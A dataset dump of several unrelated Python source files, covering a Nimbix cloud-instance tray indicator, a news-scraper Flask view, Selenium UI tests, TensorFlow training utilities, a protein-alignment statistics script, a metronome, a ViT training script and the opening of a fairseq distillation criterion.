argparse.ArgumentParser()\nparser.add_argument('--configfile', default=join(script_dir, 'nimbix.yaml'))\nparser.add_argument('--iconfile')\nargs = parser.parse_args()\nwith open(args.configfile, 'r') as f:\n config = yaml.load(f)\n\nusername = config['username']\napikey = config['apikey']\nssh_command = config['ssh_command']\nlaunch_profiles = config.get('launch_profiles', {})\nprint('launch_profiles', launch_profiles)\n\nclass IndicatorCPUSpeed(object):\n def __init__(self):\n # param1: identifier of this indicator\n # param2: name of icon. this will be searched for in the standard them\n # dirs\n # finally, the category. We're monitoring CPUs, so HARDWARE.\n self.ind = AppIndicator.Indicator.new(\n \"indicator-cpuspeed\", \n \"onboard-mono\",\n AppIndicator.IndicatorCategory.HARDWARE)\n if args.iconfile is not None:\n theme_path = path.dirname(args.iconfile)\n icon = path.basename(args.iconfile).split('.')[0]\n print('theme_path', theme_path, 'icon', icon)\n self.ind.set_icon_theme_path(theme_path)\n self.ind.set_icon(icon)\n \n# self.ind.set_icon_theme_path(join(script_dir, 'img'))\n# self.ind.set_icon('nimbix')\n\n # some more information about the AppIndicator:\n # http://developer.ubuntu.com/api/ubuntu-12.04/python/AppIndicator3-0.1.html\n # http://developer.ubuntu.com/resources/technologies/application-indicators/\n\n # need to set this for indicator to be shown\n self.ind.set_status (AppIndicator.IndicatorStatus.ACTIVE)\n\n # have to give indicator a menu\n self.menu = Gtk.Menu()\n\n # you can use this menu item for experimenting\n item = Gtk.MenuItem()\n item.set_label(\"Poll\")\n item.connect(\"activate\", self.handler_menu_test)\n item.show()\n self.menu.append(item)\n\n # this is for exiting the app\n item = Gtk.MenuItem()\n item.set_label(\"Exit\")\n item.connect(\"activate\", self.handler_menu_exit)\n item.show()\n self.menu.append(item)\n\n for launch_profile in launch_profiles:\n image = launch_profile['image']\n instancetype = launch_profile['type']\n name = launch_profile['name']\n item = Gtk.MenuItem()\n item.set_label(\"Launch %s\" % name)\n item.target_image = image\n item.target_type = instancetype\n item.connect(\"activate\", self.handler_instance_launch)\n item.show()\n self.menu.insert(item, 0)\n\n self.menu.show()\n self.ind.set_menu(self.menu)\n\n # initialize cpu speed display\n self.instance_items = []\n self.update_cpu_speeds()\n # then start updating every 2 seconds\n # http://developer.gnome.org/pygobject/stable/glib-functions.html#function-glib--timeout-add-seconds\n GLib.timeout_add_seconds(180, self.handler_timeout)\n \n def handler_poll_onetime(self):\n self.update_cpu_speeds()\n return False\n\n def handler_menu_exit(self, evt):\n Gtk.main_quit()\n\n def handler_menu_test(self, evt):\n # we can change the icon at any time\n# self.ind.set_icon(\"indicator-messages-new\")\n self.update_cpu_speeds()\n\n def handler_timeout(self):\n \"\"\"This will be called every few seconds by the GLib.timeout.\n \"\"\"\n self.update_cpu_speeds()\n # return True so that we get called again\n # returning False will make the timeout stop\n return True\n\n def handler_instance_launch(self, evt):\n self.instance_launch(evt.target_image, evt.target_type)\n\n def handler_instance_ssh(self, evt):\n self.instance_ssh(evt.job_number, evt.target_image)\n\n def handler_instance_kill(self, evt):\n self.instance_kill(evt.job_number, evt.target_image)\n\n def instance_launch(self, image, instancetype):\n launch.launch(config, image, instancetype)\n GLib.timeout_add_seconds(10, self.handler_poll_onetime)\n\n def instance_ssh(self, job_number, target_image):\n res = requests.get('%s/connect?username=%s&apikey=%s&number=%s' % (api_url, username, apikey, job_number))\n res = json.loads(res.content.decode('utf-8'))\n ip_address = res['address']\n subprocess.Popen(ssh_command.format(\n ip_address=ip_address,\n image=target_image\n ).split())\n\n def instance_kill(self, job_number, target_image):\n res = requests.get('%s/shutdown?username=%s&apikey=%s&number=%s' % (api_url, username, apikey, job_number))\n res = json.loads(res.content.decode('utf-8'))\n GLib.timeout_add_seconds(10, self.handler_poll_onetime)\n\n def update_cpu_speeds(self):\n label = 'failed'\n try:\n jobslist = jobs.get_jobs(config)\n label = ''\n for item in self.instance_items:\n self.menu.remove(item)\n self.instance_items.clear()\n for job in jobslist:\n if label != '':\n label += ' '\n if job['status'] in ['SUBMITTED']:\n label += '(' + job['type'] + ')'\n GLib.timeout_add_seconds(10, self.handler_poll_onetime) # fast poll whilst wait for it to start\n else:\n label += job['type']\n\n item = Gtk.MenuItem()\n item.set_label('ssh to %s' % job['image'])\n item.connect(\"activate\", self.handler_instance_ssh)\n item.target_image = job['image']\n item.job_number = job['number']\n item.show()\n self.menu.insert(item, 0)\n self.instance_items.append(item)\n\n item = Gtk.MenuItem()\n item.set_label('kill %s' % job['image'])\n item.connect(\"activate\", self.handler_instance_kill)\n item.target_image = job['image']\n item.job_number = job['number']\n item.show()\n self.menu.insert(item, 0)\n self.instance_items.append(item)\n\n except Exception as e:\n label = 'exception occurred'\n try:\n print(traceback.format_exc())\n except:\n print('exception in exception :-P')\n self.ind.set_label(label, \"\")\n\n def main(self):\n Gtk.main()\n\nif __name__ == \"__main__\":\n ind = IndicatorCPUSpeed()\n ind.main()\n\n","repo_name":"hughperkins/nimbix-admin","sub_path":"ubuntuindicator.py","file_name":"ubuntuindicator.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"9828168989","text":"from flask import Flask, render_template, Blueprint\nfrom requests.exceptions import HTTPError\n\nfrom modules.BBCScraper import BBCScraper\nfrom modules.MaanScraper import MaanNewsScraper\nfrom modules.RTScraper import RTScraper\nfrom modules.WafaScraper import WafaScraper\nimport time\nimport concurrent.futures\n\n\nnews_blueprint = Blueprint('news', __name__)\n\n\n@news_blueprint.route('/news')\ndef news():\n start = time.perf_counter()\n\n wafa_articles = WafaScraper.get_content()\n maan_articles = MaanNewsScraper.get_content()\n rt_articles = RTScraper.get_content()\n bbc_articles = BBCScraper.get_content()\n\n with concurrent.futures.ThreadPoolExecutor() as executer:\n f1 = executer.submit(WafaScraper.get_content)\n f2 = executer.submit(MaanNewsScraper.get_content)\n f3 = executer.submit(RTScraper.get_content)\n f4 = executer .submit(BBCScraper.get_content)\n wafa_articles = f1.result()\n maan_articles = f2.result()\n rt_articles = f3.result()\n bbc_articles = f4.result()\n finish = time.perf_counter() # end timer\n print(f\"Finished in {round(finish-start,2)} seconds\")\n return render_template(\"news/news.html\",\n wafa_articles=wafa_articles,\n maan_articles=maan_articles,\n rt_articles=rt_articles,\n bbc_articles=bbc_articles)\n\n\n\n","repo_name":"eng-aomar/content_aggergator","sub_path":"views/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27018915262","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\n\nfrom src.backup_manager.backup_manager import BackupManager\nfrom src.custom_test_case import CustomTestCase\nfrom src.drivers.drivers_provider import DriversProvider\nfrom src.nms_entities.paths_manager import PathsManager\nfrom src.options_providers.options_provider import OptionsProvider, CHROME_CONNECT\n\noptions_path = 'test_scenarios.web.stations'\nbackup_name = '10000_stations_in_1_network.txt'\n\n\nclass WebStationsCase(CustomTestCase):\n \"\"\"WEB stations interface expected elements: table/graph, filters etc. Included clicks\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.27'\n __execution_time__ = 60 # approximate case execution time in seconds\n __express__ = True\n\n @classmethod\n def set_up_class(cls):\n cls.driver = DriversProvider.get_driver_instance(\n OptionsProvider.get_connection(options_path, CHROME_CONNECT),\n driver_id='case_web_stations',\n store_driver=False\n )\n cls.backup = BackupManager()\n cls.backup.apply_backup(backup_name)\n cls.options = OptionsProvider.get_options(options_path)\n cls.buttons = cls.options.get('buttons')\n cls.checkboxes = cls.options.get('checkboxes') # filters checkboxes\n cls.first_select_id = cls.options.get('graph').get('graph_first')\n cls.second_select_id = cls.options.get('graph').get('graph_second')\n\n def test_network(self):\n \"\"\"Network stations interface\"\"\"\n self.check_stations_interface('network')\n\n def test_vno(self):\n \"\"\"Vno stations interface\"\"\"\n self.check_stations_interface('vno')\n self.assertIsNotNone(\n self.driver._get_element_by(By.CLASS_NAME, 'seclist__button'),\n msg=f'Cannot locate Group btn'\n )\n\n def test_controller(self):\n \"\"\"Controller stations interface\"\"\"\n self.check_stations_interface('controller')\n\n def check_stations_interface(self, parent):\n path = PathsManager._OBJECT_STATION.format(parent, 0)\n self.driver.load_data(path)\n for key, value in self.buttons.items():\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, value),\n msg=f'No {key} btn for {parent}'\n )\n self.check_quick_filters()\n self.check_filters()\n self.check_graph()\n\n def check_quick_filters(self):\n for key, value in self.buttons.items():\n if key in ('toggle', 'filters'):\n continue\n next_btn = self.driver._get_element_by(By.ID, value)\n next_btn.click()\n\n def check_graph(self):\n toggle_btn = self.driver._get_element_by(By.ID, self.options.get('buttons').get('toggle'))\n toggle_btn.click()\n\n for key, value in self.options.get('graph').items():\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, value, timeout=2),\n msg=f'No {key} selector (id={value})'\n )\n\n graph_x_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_x_axis'))\n selector = Select(graph_x_sel)\n for opt in self.options.get('graph_x_options'):\n selector.select_by_visible_text(opt)\n\n graph_y1_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_first'))\n selector = Select(graph_y1_sel)\n for opt in self.options.get('first_select_options'):\n selector.select_by_visible_text(opt)\n\n graph_y2_sel = self.driver._get_element_by(By.ID, self.options.get('graph').get('graph_second'))\n selector = Select(graph_y2_sel)\n for opt in self.options.get('second_select_options'):\n selector.select_by_visible_text(opt)\n\n def check_filters(self):\n filters_btn = self.driver._get_element_by(By.ID, self.buttons.get('filters'))\n filters_btn.click()\n for c_text, c_id in self.checkboxes.items():\n el = self.driver._get_element_by(By.ID, c_id)\n el.click()\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, self.options.get('filters_apply')),\n msg='No Apply for filters'\n )\n self.assertIsNotNone(\n self.driver._get_element_by(By.ID, self.options.get('filters_close')),\n msg='No Close for filters'\n )\n apply_btn = self.driver._get_element_by(By.ID, self.options.get('filters_apply'))\n apply_btn.click()\n\n def get_all_filters_ids(self):\n # Has been used once to obtain ver.4.0.0.23 filters\n \"\"\"Get all filters IDs and their respective text\"\"\"\n path = PathsManager._OBJECT_STATION.format('vno', 0)\n self.driver.load_data(path)\n filters = self.driver.driver.find_elements_by_class_name('filtersgroups__group')\n for gr in filters:\n ids = gr.find_elements_by_xpath('*[@id]')\n for i in ids:\n inner_div = i.find_element_by_class_name('filtersgroups__title')\n print(f\"{inner_div.get_attribute('innerHTML')}: {i.get_attribute('id')},\")\n\n def get_graph_options(self):\n # Has been used once to obtain ver.4.0.0.23 graph options\n \"\"\"Get all options in graph selectors\"\"\"\n path = PathsManager._OBJECT_STATION.format('vno', 0)\n self.driver.load_data(path)\n toggle_btn = self.driver._get_element_by(By.ID, self.options.get('buttons').get('toggle'))\n toggle_btn.click()\n\n first_select = self.driver._get_element_by(By.ID, self.first_select_id)\n selector = Select(first_select)\n for op in selector.options:\n print(op.text)\n print('#########################')\n\n second_select = self.driver._get_element_by(By.ID, self.second_select_id)\n selector = Select(second_select)\n for op in selector.options:\n print(op.text)\n","repo_name":"underdark456/test_system","sub_path":"test_scenarios/web/stations/case_web_stations.py","file_name":"case_web_stations.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37312466403","text":"import tensorflow as tf\nimport math\n\n\nclass WarmupExponential(tf.keras.optimizers.schedules.ExponentialDecay):\n def __init__(self, init_lr, decay_steps, decay_rate, staircase=False, warmup_steps=0):\n \"\"\"\n learning rate exponential decay에 learning rate warmup 적용.\n\n ```python\n if steps <= warmup_steps:\n return init_lr * (steps / warmup_steps)\n else:\n exponential = floor(steps / decay_steps) if staircase else steps / decay_steps\n return init_lr * decay_rate ** exponential\n ```\n\n :param init_lr: exponential decay의 초기 lr\n :param decay_steps: decay_rate 지수의 분모\n :param decay_rate: lr을 감소시키는 비율\n :param staircase: decay_rate의 지수를 floor할지 여부. 적용시 lr은 계단함수\n :param warmup_steps: lr을 0부터 init_lr까지 선형적으로 증가시킬 스텝 수\n \"\"\"\n super(WarmupExponential, self).__init__(\n initial_learning_rate=init_lr,\n decay_steps=decay_steps,\n decay_rate=decay_rate,\n staircase=staircase,\n )\n self.init_lr = init_lr\n self.warmup_steps = warmup_steps\n\n @tf.function\n def __call__(self, steps):\n if tf.math.less_equal(steps, self.warmup_steps):\n return self.init_lr * (steps / self.warmup_steps)\n else:\n return super(WarmupExponential, self).__call__(steps)\n\n\nclass WarmupCosineLRDecay(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, init_lr, total_batch, warmup_steps=0):\n \"\"\"\n learning rate cosine decay & learning rate warmup\n\n :param init_lr: cosine decay의 초기 lr\n :param total_batch: cosine decay를 적용할 총 스텝 수\n :param warmup_steps: lr을 0부터 init_lr까지 선형적으로 증가시킬 스텝 수\n \"\"\"\n super(WarmupCosineLRDecay, self).__init__()\n self.init_lr = init_lr\n self.T = total_batch - warmup_steps\n self.warmup_steps = warmup_steps\n\n @tf.function\n def __call__(self, steps):\n if tf.math.less_equal(steps, self.warmup_steps):\n return self.init_lr * (steps / self.warmup_steps)\n else:\n steps_after_warmup = steps - self.warmup_steps\n cur_lr = self.init_lr * (1 + tf.math.cos(steps_after_warmup * math.pi / self.T)) / 2\n return cur_lr\n\n\n@tf.function\ndef label_smoothing(one_hot, epsilon=.1, K=10):\n \"\"\"\n one-hot 벡터에 label smoothing 적용\n\n :param one_hot: one-hot 벡터\n :param epsilon: label smoothing 계수\n :param K: one-hot 벡터의 카테고리 수\n :return: label smoothed 벡터\n \"\"\"\n label_smooth = one_hot * ((1 - epsilon) - (epsilon / (K-1)))\n label_smooth += epsilon / (K-1)\n return label_smooth\n\n\n@tf.function\ndef mix_up(img_batch, label_batch, alpha=.2):\n \"\"\"\n 이미지와 레이블에 mixup augmentation 적용\n Beta(alpha, alpha) 분포에서 샘플링한 값을 가중치로 하여 두 이미지, 레이블을 선형 보간.\n\n :param img_batch: 이미지 배치\n :param label_batch: 레이블 배치\n :param alpha: Beta 분포 계수\n :return: mixup된 이미지, 레이블 배치쌍\n \"\"\"\n batch_size = tf.shape(img_batch)[0]\n lambda_ = tf.compat.v1.distributions.Beta(alpha, alpha).sample([batch_size])\n\n lambda_img = tf.reshape(lambda_, (batch_size, 1, 1, 1))\n lambda_label = tf.reshape(lambda_, (batch_size, 1))\n\n perm = tf.random.shuffle(tf.range(batch_size))\n img_batch_shuffle = tf.gather(img_batch, perm, axis=0)\n label_batch_shuffle = tf.gather(label_batch, perm, axis=0)\n\n img_batch_mixup = lambda_img * img_batch + (1-lambda_img) * img_batch_shuffle\n label_batch_mixup = lambda_label * label_batch + (1-lambda_label) * label_batch_shuffle\n\n return img_batch_mixup, label_batch_mixup\n\n\nif __name__ == '__main__':\n # we = WarmupExponential(.1, warmup_steps=5, decay_steps=10, decay_rate=.1, staircase=True)\n # for step in range(0, 60, 5):\n # print('{} steps - lr : {}'.format(step, we(step)))\n\n print(label_smoothing(tf.constant([[0, 0, 0, 1, 0], [1, 0, 0, 0, 0]], dtype=tf.float32), K=5))\n","repo_name":"canlion/deeplearning_study","sub_path":"mixed_precision_training/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29668904119","text":"#Purpose of this script is to read protein MSA of 3K proteins for a given locus,\n# and profile counts of each amino acid, per variety and grouped variety\n\n\nfrom Bio import AlignIO\nimport os\nimport os, shutil, gzip\n\nVAR_MAPPING_FILE = \"3k_pop_details_UTF-8_v3.tsv\"\n\n\n\nvar_to_original_var_name = {}\n\ndef gunzip_file(gzipped_file):\n\n input = gzip.GzipFile(gzipped_file, 'rb')\n s = input.read()\n input.close()\n\n gunzipped_output = os.path.splitext(gzipped_file)[0]\n print(\"Unzipping...\" + gzipped_file)\n output = open(gunzipped_output, 'wb')\n output.write(s)\n output.close()\n return gunzipped_output\n\n\ndef read_alignment(alignment_gz_file):\n\n\n #align_handle = gzip.open(alignment_file, \"rt\")\n #for record in SeqIO.parse(handle, \"fasta\"):\n # print(record.id, len(record))\n #handle.close()\n\n #alignment = AlignIO.read(alignment_file, \"fasta\")\n with gzip.open(alignment_gz_file, \"rt\") as fin:\n alignment = AlignIO.read(handle=fin, format=\"fasta\")\n\n number_of_seqs = len(alignment)\n length_of_alignment = len(alignment[0].seq)\n\n #print(\"alen\",length_of_alignment)\n #exit()\n\n amino_acid_subs = {}\n\n for j in range(0, length_of_alignment):\n chars_at_pos_to_varieties = {}\n for i in range(0,number_of_seqs):\n\n current_char=alignment[i].seq[j]\n varieties = []\n if current_char in chars_at_pos_to_varieties:\n varieties = chars_at_pos_to_varieties[current_char]\n\n #LOC_Os01g70270.1_LUBANG PUTI::IRGC 5429-1::[IRIS 313-10513] \n #LOC_Os01g70270.1_QB_604::[CX210] \n #Os05t0392300-02_NIAO YAO::IRGC 5496-1::[IRIS 313-8743] \n description = alignment[i].description\n #if description[0:3] == \"LOC\": #MSU\n # variety_name = description.split(\"_\",2)[2].split(\"<\")[0][:-1].split(\"[\")[0] #grab LUBANG PUTI::IRGC 5429-1::\n #else:\n # variety_name = description.split(\"_\",1)[1].split(\"<\")[0][:-1].split(\"[\")[0]\n\n if description[0:3] == \"LOC\": # MSU\n variety_name = description.split(\"_\",2)[2].split(\" \")[0]\n else:\n variety_name = description.split(\"_\")[1].split(\" \")[0]\n\n\n #Manual fix (\"reference\") also appears but can be safely ignored\n #if variety_name == \"Reference\":\n # variety_name = \"NIPPONBARE::\"\n\n var_to_original_var_name[variety_name] = alignment[i].description\n varieties.append(variety_name)\n chars_at_pos_to_varieties[current_char] = varieties\n\n if len(chars_at_pos_to_varieties.keys()) > 1:\n #print(\"amino acid change found\",repr(chars_at_pos_to_varieties))\n amino_acid_subs[j] = chars_at_pos_to_varieties\n return amino_acid_subs\n\ndef read_variety_group_mapping(mapping_file):\n variety_id_to_group = {}\n\n f = open(mapping_file,\"r\",encoding=\"Latin-1\")\n\n for line in f:\n line = line[:-1]\n #print(line)\n cells = line.split(\"\\t\")\n #var_id = cells[0].split(\"[\")[0] #PADI SIRANDAH KUNING::IRGC 73762-1::[IRIS 313-11904] take up to first [\n var_id = cells[1] #Simpler to get the ID only\n var_group = cells[3]\n variety_id_to_group[var_id] = var_group\n\n return variety_id_to_group\n\n#Count the different variety groups with each sub\ndef count_groups_per_sub(aa_subs,var_to_group,out_file):\n\n f_out = open(out_file,\"w\")\n f_out.write(\"pos,aa,vargroup,count\\n\")\n\n for pos in aa_subs:\n char_to_varieties = aa_subs[pos]\n for aa in char_to_varieties:\n vargroup_to_count = {}\n #print(repr(char_to_varieties[aa]))\n for variety in char_to_varieties[aa]:\n if variety in var_to_group:\n group = var_to_group[variety]\n count = 0\n\n #print(\"group\",group)\n if group in vargroup_to_count:\n count = vargroup_to_count[group]\n count = count + 1\n vargroup_to_count[group] = count # increment counters\n else:\n if variety != \"reference\" and variety != \"Reference\": #Safely ignore\n print(\"variety not found\",variety,\"original name:\",var_to_original_var_name[variety])\n\n\n for vargroup in vargroup_to_count:\n count = vargroup_to_count[vargroup]\n #print(pos,aa,vargroup,count)\n f_out.write(str(pos+1)+\",\"+aa+\",\"+vargroup+\",\"+str(count)+\"\\n\") #Positions changed to start counting at 1\n #print(repr(vargroup_to_count))\n print(\"Finished writing to \",out_file)\n\ndef create_MSA_pos_stats(three_k_prot_align_file,out_folder):\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n amino_acid_subs_vars = read_alignment(three_k_prot_align_file)\n var_id_to_group = read_variety_group_mapping(VAR_MAPPING_FILE)\n output_file = out_folder + os.path.basename(three_k_prot_align_file).split(\".\")[0] + \"_stats.csv\"\n count_groups_per_sub(amino_acid_subs_vars, var_id_to_group, output_file)\n\n\n#ALIGNMENT_FILE = \"variety_fasta/ARFs/LOC_Os01g70270.1_proteins_in_varieties.fasta\"\ndef run_tests():\n ALIGNMENT_FILE = \"variety_fasta/ARFs/LOC_Os11g32110.1_proteins_in_varieties.fasta\"\n amino_acid_subs_vars = read_alignment(ALIGNMENT_FILE)\n var_id_to_group = read_variety_group_mapping(VAR_MAPPING_FILE)\n\n output_file = \"temp_alignments_outs/\" + os.path.basename(ALIGNMENT_FILE).split(\".\")[0] + \"_stats.csv\"\n count_groups_per_sub(amino_acid_subs_vars,var_id_to_group,output_file)","repo_name":"andrewrobertjones/rice-snp-ptm-analysis","sub_path":"SNPSeek/Extract_stats_from_protein_alignment.py","file_name":"Extract_stats_from_protein_alignment.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27497328899","text":"import time\nimport wave\nimport pyaudio\n\n\nclass Tick(object):\n\n CHUNK = 1024\n\n def __init__(self, beats_per_min=None, wav_file=None):\n self._beats_per_min = beats_per_min\n\n sound = wave.open(wav_file)\n try:\n player = pyaudio.PyAudio()\n self._stream = player.open(\n format=player.get_format_from_width(sound.getsampwidth()),\n channels=sound.getnchannels(),\n rate=sound.getframerate(),\n output=True)\n self._data = sound.readframes(Tick.CHUNK)\n finally:\n sound.close()\n\n def set_beats_per_min(self, v):\n print(\"bpm={bpm}\".format(bpm=v))\n self._beats_per_min = v\n\n def toc(self):\n before = time.time()\n self._stream.write(self._data)\n after = time.time()\n dt = after - before\n time.sleep(60. / self._beats_per_min - dt)\n\n\ndef start_metronome(beats_per_min, ticks=None, mins=None, speed_up=-1, upper_limit=-1, wav_file='beep.wav'):\n\n tick = Tick(wav_file=wav_file)\n while True:\n\n tick.set_beats_per_min(beats_per_min)\n\n if ticks is not None:\n for x in range(ticks):\n tick.toc()\n\n elif mins is not None:\n start = time.time()\n while True:\n tick.toc()\n now = time.time()\n if (now - start) / 60. > mins:\n break\n\n beats_per_min += speed_up\n\n if beats_per_min > upper_limit:\n break","repo_name":"skliarpawlo/tictac","sub_path":"utils/metr.py","file_name":"metr.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26388901124","text":"import os \nimport json\nimport torch\nimport pickle\nimport argparse\nimport numpy as np \nfrom datetime import datetime\nfrom vit_pytorch.modules import ViT, build_head\nfrom vit_pytorch.data import create_loaders\nfrom vit_pytorch.configs import MODEL_CFGS\nfrom vit_pytorch.utils import set_seed, get_num_params, freeze_model, Meter, mkdir, save_model\nfrom vit_pytorch.solver import train_epoch, eval_epoch, get_criterion, get_optimizer, get_scheduler, WarmupScheduler, EarlyStopper\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef main(args):\n set_seed(args.random_seed)\n\n # prepare data\n print('Create data loaders.')\n train_loader, valid_loader, num_classes = create_loaders(args)\n print('Number of classes : {}.'.format(num_classes))\n print('Training sample : {}.'.format(len(train_loader.dataset)))\n \n if valid_loader is not None:\n print('Validation sample : {}.'.format(len(valid_loader.dataset)))\n\n # build model\n print('Build model.')\n is_build_head = False\n\n if args.model_config in MODEL_CFGS:\n is_build_head = True \n model_config = MODEL_CFGS[args.model_config]\n else:\n with open(args.model_config, 'r') as f:\n model_config = json.load(f)\n\n model = ViT(**model_config)\n\n if args.pretrained_weights is not None:\n model.load_state_dict(torch.load(args.pretrained_weights))\n print('Successfully load pre-trained weights from `{}`'.format(args.pretrained_weights))\n\n if args.freeze_extractor:\n print('Freeze feature extractor weights.')\n freeze_model(model)\n\n if model_config['repr_dim'] is not None:\n repr_dim = model_config['repr_dim']\n else:\n repr_dim = model_config['embed_dim']\n\n if is_build_head:\n model.head = build_head(repr_dim, num_classes)\n\n model.to(args.device)\n\n # init meters\n train_meter = Meter()\n\n if valid_loader is not None:\n valid_meter = Meter()\n\n # get criterion\n assert num_classes > 1\n loss = 'bce' if num_classes == 2 else 'ce'\n criterion = get_criterion(loss).to(args.device)\n\n # get optimizer and schedulers\n optimizer = get_optimizer(model, args) \n warmup_scheduler = WarmupScheduler(optimizer, args.warmup)\n training_scheduler = get_scheduler(optimizer, args)\n\n if args.patient is not None:\n early_stopper = EarlyStopper(args.monitor, args.patient, args.min_delta)\n else:\n early_stopper = None \n\n # output dir\n output_dir = args.output_dir\n\n if output_dir is None:\n output_dir = os.path.join(\n ROOT_DIR, 'results', \n datetime.now().strftime('result_%Y-%m-%d-%H-%M')\n )\n\n mkdir(output_dir)\n \n # training\n best_score = 0\n not_improve_cnt = 0\n\n print('Start training.')\n for epoch in range(args.max_epoch):\n _meter_t = train_epoch(model, train_loader, criterion, optimizer, Meter(), args.device, epoch + 1)\n train_meter.update({'loss': np.mean(_meter_t['loss']), 'acc': np.mean(_meter_t['acc'])})\n\n if valid_loader is not None:\n _meter_v = eval_epoch(model, valid_loader, criterion, Meter(), args.device, epoch + 1)\n valid_meter.update({'loss': np.mean(_meter_v['loss']), 'acc': np.mean(_meter_v['acc'])})\n\n if valid_meter is not None and early_stopper is not None:\n early_stopper.step(np.mean(_meter_v[args.monitor]))\n\n if early_stopper.is_best and args.save_best:\n weights_path = os.path.join(output_dir, 'improved_ep{}.pt'.format(str(epoch + 1)))\n save_model(model, weights_path)\n else:\n print('No improved count : {}/{}'.format(early_stopper.not_improved_cnt, args.patient))\n\n if early_stopper.is_early_stop:\n print('Early stop at epoch {}'.format(not_improve_cnt))\n break\n \n # save results \n weights_path = os.path.join(output_dir, 'weights.pt')\n save_model(model, weights_path)\n\n try:\n model_config_path = os.path.join(output_dir, 'model_config.json')\n\n with open(model_config_path, 'w') as f:\n json.dump(model_config, f)\n\n print('Successfully save training history to `{}/`'.format(output_dir))\n\n except Exception as e:\n print(e)\n\n try:\n train_hist_path = os.path.join(output_dir, 'train_history.csv')\n valid_hist_path = os.path.join(output_dir, 'valid_history.csv')\n \n train_meter.to_dataframe().to_csv(train_hist_path, index=False) \n\n if valid_meter is not None:\n valid_meter.to_dataframe().to_csv(valid_hist_path, index=False) \n\n print('Successfully save training history to `{}/*`'.format(output_dir))\n\n except Exception as e:\n print(e)\n\n print('Training process done.')\n \n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser(description='')\n\n # paths\n argparser.add_argument('train_dir', type=str, help='Directory of training data.')\n argparser.add_argument('--valid_dir', type=str, help='Directory of validation data.', default=None)\n argparser.add_argument('--valid_rate', type=str, help='Proportion of validation sample splitted from training data.', default=None) \n argparser.add_argument('--output_dir', type=str, help='Output directory.', default=None)\n\n # model\n argparser.add_argument('--model_config', type=str, help='Modle arch configuration. (config path or arch name, e.g. \"B_16_384\")', default='B_16_384')\n argparser.add_argument('--pretrained_weights', type=str, help='Pre-trained weights filename.', default=None)\n argparser.add_argument('--freeze_extractor', type=bool, help='If True, freeze the feature extractor weights.', default=True)\n \n # training\n argparser.add_argument('--batch_size', type=int, help='Batch size.', default=64)\n argparser.add_argument('--init_lr', type=float, help='Initial learning rate.', default=1e-3) \n argparser.add_argument('--weight_decay', type=float, help='Weight decay (L2 penalty).', default=1e-5)\n argparser.add_argument('--beta1', type=float, help='Adam `betas` param 1.', default=0.9)\n argparser.add_argument('--beta2', type=float, help='Adam `betas` param 2.', default=0.999) \n argparser.add_argument('--max_epoch', type=int, help='Maximun training epochs.', default=100)\n argparser.add_argument('--patient', type=int, help='Improved patient for early stopping', default=None)\n argparser.add_argument('--monitor', type=str, help='Metric to be monitored', choices=['loss', 'acc'], default='loss')\n argparser.add_argument('--min_delta', type=float, help='Minimum change in the monitored metric to qualify as an improvement', default=0.)\n argparser.add_argument('--save_best', type=bool, help='Whether to save weights from the epoch with the best monitored metric', default=True)\n argparser.add_argument('--warmup', type=int, help='Warmup epochs.', default=0)\n argparser.add_argument('--scheduler', type=str, help='Training scheduler.', choices=['cosine', 'step', 'exp'], default=None)\n argparser.add_argument('--t_max', type=int, help='Maximum number of iterations (cosine).', default=10)\n argparser.add_argument('--eta_min', type=float, help='Minimum learning rate. (cosine)', default=0.)\n argparser.add_argument('--step_size ', type=int, help='Period of learning rate decay. (step)', default=10)\n argparser.add_argument('--gamma', type=float, help='Multiplicative factor of learning rate decay. (step/exp)', default=0.1)\n\n # augmentation\n argparser.add_argument('--image_size', type=int, help='Input image size.', default=384)\n argparser.add_argument('--crop_margin', type=int, help='Margin for random cropping.', default=32)\n argparser.add_argument('--horizontal_flip', type=float, help='Horizontal flip prob.', default=0.5)\n argparser.add_argument('--rotation', type=float, help='Degree for random rotation.', default=10.)\n argparser.add_argument('--device', type=str, help='Computation device.', default='cuda')\n argparser.add_argument('--random_seed', type=int, help='Random seed in this repo.', default=427)\n \n args = argparser.parse_args()\n main(args)\n","repo_name":"godofpdog/ViT_PyTorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"44"} +{"seq_id":"17346888279","text":"import math\nimport torch\nimport torch.nn.functional as F\n\nfrom fairseq import utils, metrics\n\nfrom . import FairseqCriterion, register_criterion\n\n\n@register_criterion('knowledge_distillation')\nclass CrossEntropyKnowledgeDistillationCriterion(FairseqCriterion):\n\n def __init__(self, args, task):\n super().__init__(task)\n # Lambda ranges between 0.0 and 1.0. 0.0 means that we only use the ground\n # truth labels (ie. it is the same as the normal cross entropy); 1.0 means\n # that only the teacher output is taken in account.\n self._lambda = args.kd_lambda\n self.temperature = args.kd_temperature\n self.sentence_avg = args.sentence_avg\n\n @classmethod\n def build_criterion(cls, args, task):\n return cls(args, task)\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add criterion-specific arguments to the 